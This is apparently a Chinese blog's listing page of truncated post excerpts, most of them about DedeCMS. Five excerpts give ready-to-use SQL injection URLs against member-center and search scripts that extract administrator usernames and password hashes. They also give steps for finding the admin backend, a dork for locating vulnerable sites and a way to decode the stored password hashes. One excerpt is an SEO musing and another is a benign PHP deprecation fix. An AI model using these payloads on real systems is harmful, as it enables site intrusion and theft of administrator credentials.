• 需要:magic_quotes_gpc = Off DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码: http://www.killsec.com/de/member/pm.php?dopost=read&id=1 %27%20and%20@%60%27%60%20and%20 %28SELECT%201%20FROM%20%28select %20count%28*%29,concat%28floor%28rand %280%29*2%29,%28substring%28%28Select%20%28 version%28%29%29%29,1,62%29%29%29a %20from%20i...
    作者:熊猫| 发布:2014年1月21日| 阅读:2,224次| 分类:PHP, 漏洞列表, 编程语言| 标签:
  • 解密:织梦密码是cmd5加密,为20位,去掉前三位与后一位。 后台:默认的是dede/login.php 1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理 员帐号,新版本的就直接转向了后台. 2.include/dialog/config.php会爆出后台管理路径 3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录 4.include...
    作者:熊猫| 发布:2014年1月21日| 阅读:2,621次| 分类:PHP, 漏洞列表, 编程语言| 标签:, ,
  • 先提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a 看结果如果提示 1、Safe Alert: Request Error step 2 ! 那么直接用下面的exp http://www.xxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3, 4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+fr...
    作者:熊猫| 发布:2014年1月21日| 阅读:1,999次| 分类:PHP, 漏洞列表, 编程语言| 标签:,
  • 一、首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,(判断是否是dede的cms 以及看看是否和这个漏洞相对应) 二、然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面 看是否可注入 三、爆用户:/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id ...
    作者:熊猫| 发布:2014年1月21日| 阅读:3,052次| 分类:PHP, 漏洞列表, 编程语言| 标签:,
  • 关键词:powered by dedecms 首先注册个用户,注册地址: /member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号: /member/buy_action.php?product=member&pid=1%20and%201=11%20union %20select%201,2,userid,4,5%20from%20%23@__admin/* 爆管理员密码 /member/buy_action.php?product=member&pid=1%20and%201=11%20union%20 select%201,2,substring(pwd,9,1...
    作者:熊猫| 发布:2014年1月21日| 阅读:2,613次| 分类:PHP, 漏洞列表, 编程语言| 标签:,
  • 在以前的文章中,我说了不能放弃自己的博客,要每天针对一个问题来谈谈自己的见解,这是我能想到的最符合当前用户体验的一个招了。我没有像大部分人那样以公益讲课的形式来帮助大家,原因有二,第一我觉得自己还木有那样的能力在那种情况下和大家滔滔不绝,第二我觉得自己性格比较内敛(差点打成内链),所以咱继续今天的话题:为什么网站的收录和外链一直在减少? 希望大家...
    作者:熊猫| 发布:2013年12月29日| 阅读:1,656次| 分类:漏洞列表| 标签:, , ,
  • 使用最新版的wamp,内置的是5.3版本的php,安装dedecms5.5以后,出现了 Deprecated: Function ereg_replace() is deprecated in ..\dedecms\dede\config.php on line 2 原因ereg_replace是php5.3中废弃的标签,不推进使用了。解决方法很简单,就是将dede\config.php文件的第二行替换成 define('DEDEADMIN', preg_replace("/[\/\\\\]{1,}/", '/', dirname(__FILE__))); 这样...
    作者:熊猫| 发布:2013年12月28日| 阅读:2,202次| 分类:程序问题, 网站建设| 标签: